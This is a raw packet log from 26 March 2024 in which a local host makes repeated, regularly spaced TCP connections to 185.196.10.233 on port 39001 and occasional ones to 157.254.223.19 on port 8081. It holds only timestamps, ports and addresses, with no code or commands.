Mar 26, 2024 18:24:34.843889952 CET	49810	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:34.908284903 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:24:35.030457973 CET	39001	49810	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:35.030560970 CET	49810	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:35.043545961 CET	49810	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:35.071424961 CET	8081	49797	157.254.223.19	192.168.2.5
Mar 26, 2024 18:24:35.285196066 CET	39001	49810	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:35.285384893 CET	49810	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:35.509088993 CET	39001	49810	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:35.553062916 CET	49810	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:35.740118027 CET	39001	49810	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:35.741004944 CET	49810	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:35.853599072 CET	49811	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:35.927390099 CET	39001	49810	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:35.927617073 CET	39001	49810	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:35.927669048 CET	49810	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:36.040318966 CET	39001	49811	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:36.040395975 CET	49811	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:36.072839022 CET	49811	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:36.300616026 CET	39001	49811	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:36.300713062 CET	49811	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:36.507976055 CET	39001	49811	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:36.553061962 CET	49811	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:36.740405083 CET	39001	49811	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:36.741182089 CET	49811	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:36.850862980 CET	49812	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:36.927861929 CET	39001	49811	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:36.927892923 CET	39001	49811	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:36.927943945 CET	49811	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:37.038412094 CET	39001	49812	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:37.041542053 CET	49812	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:37.054265976 CET	49812	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:37.285109997 CET	39001	49812	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:37.285207033 CET	49812	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:37.515125036 CET	39001	49812	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:37.568837881 CET	49812	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:37.755469084 CET	39001	49812	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:37.756258965 CET	49812	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:37.873315096 CET	49813	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:37.942833900 CET	39001	49812	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:37.943011045 CET	39001	49812	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:37.943053007 CET	49812	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:38.060054064 CET	39001	49813	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:38.060157061 CET	49813	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:38.072637081 CET	49813	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:38.300688028 CET	39001	49813	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:38.300786972 CET	49813	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:38.520426989 CET	39001	49813	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:38.568698883 CET	49813	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:38.755474091 CET	39001	49813	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:38.756299019 CET	49813	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:38.866664886 CET	49814	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:38.942837000 CET	39001	49813	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:38.942991018 CET	39001	49813	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:38.943030119 CET	49813	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:39.053402901 CET	39001	49814	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:39.053545952 CET	49814	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:39.065258980 CET	49814	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:39.300688028 CET	39001	49814	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:39.300873041 CET	49814	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:39.508555889 CET	39001	49814	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:39.553169966 CET	49814	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:39.740048885 CET	39001	49814	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:39.740720034 CET	49814	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:39.850779057 CET	49815	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:39.927381039 CET	39001	49814	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:39.927532911 CET	39001	49814	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:39.927601099 CET	49814	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:40.037489891 CET	39001	49815	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:40.037667036 CET	49815	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:40.050800085 CET	49815	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:40.285180092 CET	39001	49815	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:40.285252094 CET	49815	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:40.493047953 CET	39001	49815	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:40.537436008 CET	49815	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:40.723982096 CET	39001	49815	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:40.724760056 CET	49815	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:40.835196018 CET	49816	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:40.911556005 CET	39001	49815	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:40.911720991 CET	39001	49815	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:40.911793947 CET	49815	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:41.021958113 CET	39001	49816	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:41.022083044 CET	49816	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:41.056118011 CET	49816	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:41.284907103 CET	39001	49816	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:41.285058022 CET	49816	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:41.500119925 CET	39001	49816	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:41.553061008 CET	49816	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:41.739727020 CET	39001	49816	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:41.740632057 CET	49816	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:41.850850105 CET	49817	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:41.927201986 CET	39001	49816	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:41.927433968 CET	39001	49816	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:41.927608013 CET	49816	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:42.037592888 CET	39001	49817	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:42.037668943 CET	49817	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:42.085675001 CET	49817	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:42.316261053 CET	39001	49817	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:42.316468000 CET	49817	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:42.523040056 CET	39001	49817	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:42.568686008 CET	49817	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:42.755122900 CET	39001	49817	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:42.755980015 CET	49817	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:42.866501093 CET	49818	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:42.942385912 CET	39001	49817	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:42.942625046 CET	39001	49817	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:42.942681074 CET	49817	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:43.053345919 CET	39001	49818	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:43.053431034 CET	49818	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:43.067337990 CET	49818	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:43.300779104 CET	39001	49818	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:43.300949097 CET	49818	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:43.509582996 CET	39001	49818	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:43.553136110 CET	49818	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:43.740158081 CET	39001	49818	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:43.741226912 CET	49818	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:43.850811958 CET	49819	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:43.927742004 CET	39001	49818	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:43.927987099 CET	39001	49818	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:43.928101063 CET	49818	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:44.037578106 CET	39001	49819	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:44.037679911 CET	49819	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:44.052576065 CET	49819	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:44.285286903 CET	39001	49819	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:44.285394907 CET	49819	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:44.491991043 CET	39001	49819	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:44.537576914 CET	49819	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:44.724297047 CET	39001	49819	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:44.725090981 CET	49819	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:44.835334063 CET	49820	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:44.911935091 CET	39001	49819	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:44.912055969 CET	39001	49819	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:44.912134886 CET	49819	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:45.022097111 CET	39001	49820	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:45.022169113 CET	49820	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:45.045074940 CET	49820	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:45.272531033 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:24:45.285165071 CET	39001	49820	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:45.285248995 CET	49820	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:45.430840015 CET	8081	49797	157.254.223.19	192.168.2.5
Mar 26, 2024 18:24:45.492044926 CET	39001	49820	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:45.537508965 CET	49820	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:45.724406958 CET	39001	49820	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:45.727778912 CET	49820	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:45.835139990 CET	49821	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:45.914479017 CET	39001	49820	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:45.914710999 CET	39001	49820	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:45.914768934 CET	49820	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:46.021833897 CET	39001	49821	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:46.021913052 CET	49821	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:46.044709921 CET	49821	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:46.284965038 CET	39001	49821	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:46.285089016 CET	49821	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:46.501343012 CET	39001	49821	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:46.553117990 CET	49821	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:46.739419937 CET	39001	49821	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:46.740102053 CET	49821	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:46.850895882 CET	49822	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:46.926481962 CET	39001	49821	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:46.926806927 CET	39001	49821	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:46.926913977 CET	49821	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:47.037487030 CET	39001	49822	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:47.037579060 CET	49822	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:47.063380003 CET	49822	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:47.300626040 CET	39001	49822	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:47.300683022 CET	49822	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:47.511583090 CET	39001	49822	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:47.553105116 CET	49822	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:47.739628077 CET	39001	49822	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:47.740519047 CET	49822	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:47.851110935 CET	49823	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:47.926887989 CET	39001	49822	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:47.927253962 CET	39001	49822	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:47.927301884 CET	49822	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:48.037795067 CET	39001	49823	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:48.037864923 CET	49823	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:48.063724041 CET	49823	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:48.300966024 CET	39001	49823	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:48.301049948 CET	49823	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:48.528119087 CET	39001	49823	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:48.568700075 CET	49823	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:48.755327940 CET	39001	49823	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:48.756093979 CET	49823	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:48.866524935 CET	49824	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:48.915299892 CET	8081	49797	157.254.223.19	192.168.2.5
Mar 26, 2024 18:24:48.944825888 CET	39001	49823	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:48.944884062 CET	39001	49823	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:48.944946051 CET	49823	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:48.959348917 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:24:49.053107977 CET	39001	49824	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:49.053190947 CET	49824	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:49.075460911 CET	49824	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:49.316339970 CET	39001	49824	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:49.316390038 CET	49824	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:49.531730890 CET	39001	49824	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:49.584450006 CET	49824	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:49.770956993 CET	39001	49824	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:49.771575928 CET	49824	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:49.882256985 CET	49825	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:49.958156109 CET	39001	49824	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:49.958421946 CET	39001	49824	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:49.958488941 CET	49824	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:50.068923950 CET	39001	49825	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:50.069066048 CET	49825	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:50.408962011 CET	49825	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:50.644315958 CET	39001	49825	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:50.647557020 CET	49825	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:50.878755093 CET	39001	49825	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:50.879054070 CET	39001	49825	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:50.928085089 CET	49825	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:51.114345074 CET	39001	49825	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:51.115166903 CET	49825	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:51.301501036 CET	39001	49825	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:51.301691055 CET	39001	49825	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:51.301769972 CET	49825	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:52.932010889 CET	49826	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:53.118701935 CET	39001	49826	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:53.118798971 CET	49826	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:53.130882025 CET	49826	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:53.363187075 CET	39001	49826	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:53.363313913 CET	49826	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:53.576117992 CET	39001	49826	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:53.631264925 CET	49826	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:53.817779064 CET	39001	49826	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:53.818624020 CET	49826	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:53.929073095 CET	49828	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:54.005450010 CET	39001	49826	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:54.006071091 CET	39001	49826	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:54.006155968 CET	49826	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:54.116225004 CET	39001	49828	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:54.116308928 CET	49828	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:54.141495943 CET	49828	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:54.379018068 CET	39001	49828	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:54.379072905 CET	49828	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:54.590605974 CET	39001	49828	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:54.631283998 CET	49828	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:54.817836046 CET	39001	49828	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:54.818527937 CET	49828	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:54.929047108 CET	49829	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:55.007874966 CET	39001	49828	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:55.008117914 CET	39001	49828	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:55.008186102 CET	49828	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:55.115978956 CET	39001	49829	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:55.116167068 CET	49829	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:55.131059885 CET	49829	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:55.365052938 CET	39001	49829	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:55.365163088 CET	49829	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:55.574567080 CET	39001	49829	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:55.615639925 CET	49829	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:55.709811926 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:24:55.802185059 CET	39001	49829	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:55.803118944 CET	49829	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:55.868395090 CET	8081	49797	157.254.223.19	192.168.2.5
Mar 26, 2024 18:24:55.913595915 CET	49830	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:55.989856958 CET	39001	49829	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:55.990092039 CET	39001	49829	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:55.990145922 CET	49829	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:56.100425005 CET	39001	49830	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:56.100511074 CET	49830	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:56.125662088 CET	49830	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:56.363239050 CET	39001	49830	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:56.363498926 CET	49830	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:56.596281052 CET	39001	49830	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:56.646846056 CET	49830	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:56.833451986 CET	39001	49830	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:56.834350109 CET	49830	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:56.944636106 CET	49831	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:57.021014929 CET	39001	49830	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:57.021267891 CET	39001	49830	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:57.021378040 CET	49830	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:57.131499052 CET	39001	49831	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:57.131575108 CET	49831	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:57.156955004 CET	49831	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:57.394401073 CET	39001	49831	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:57.394494057 CET	49831	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:57.611777067 CET	39001	49831	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:57.662498951 CET	49831	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:57.849121094 CET	39001	49831	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:57.850737095 CET	49831	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:57.961268902 CET	49832	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:58.037364006 CET	39001	49831	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:58.037652969 CET	39001	49831	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:58.037712097 CET	49831	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:58.148078918 CET	39001	49832	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:58.148211956 CET	49832	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:58.174355030 CET	49832	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:58.409981966 CET	39001	49832	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:58.410037041 CET	49832	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:58.622368097 CET	39001	49832	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:58.662489891 CET	49832	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:58.849205017 CET	39001	49832	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:58.850712061 CET	49832	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:58.960211992 CET	49834	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:59.037363052 CET	39001	49832	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:59.037700891 CET	39001	49832	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:59.039669991 CET	49832	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:59.147305965 CET	39001	49834	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:59.147459030 CET	49834	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:59.176255941 CET	49834	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:59.410125017 CET	39001	49834	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:59.410182953 CET	49834	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:59.617613077 CET	39001	49834	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:59.662497997 CET	49834	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:59.849181890 CET	39001	49834	185.196.10.233	192.168.2.5
Mar 26, 2024 18:24:59.850284100 CET	49834	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:24:59.972317934 CET	49835	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:00.040766001 CET	39001	49834	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:00.040957928 CET	39001	49834	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:00.041009903 CET	49834	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:00.159038067 CET	39001	49835	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:00.159171104 CET	49835	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:00.172103882 CET	49835	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:00.410077095 CET	39001	49835	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:00.410270929 CET	49835	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:00.615786076 CET	39001	49835	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:00.662477016 CET	49835	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:00.848922968 CET	39001	49835	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:00.849877119 CET	49835	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:00.960593939 CET	49836	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:01.036420107 CET	39001	49835	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:01.036637068 CET	39001	49835	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:01.036704063 CET	49835	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:01.147329092 CET	39001	49836	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:01.147448063 CET	49836	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:01.161143064 CET	49836	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:01.394932985 CET	39001	49836	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:01.395028114 CET	49836	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:01.607204914 CET	39001	49836	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:01.662498951 CET	49836	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:01.849004030 CET	39001	49836	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:01.849672079 CET	49836	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:01.960274935 CET	49837	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:02.036191940 CET	39001	49836	185.196.10.233	192.168.2.5
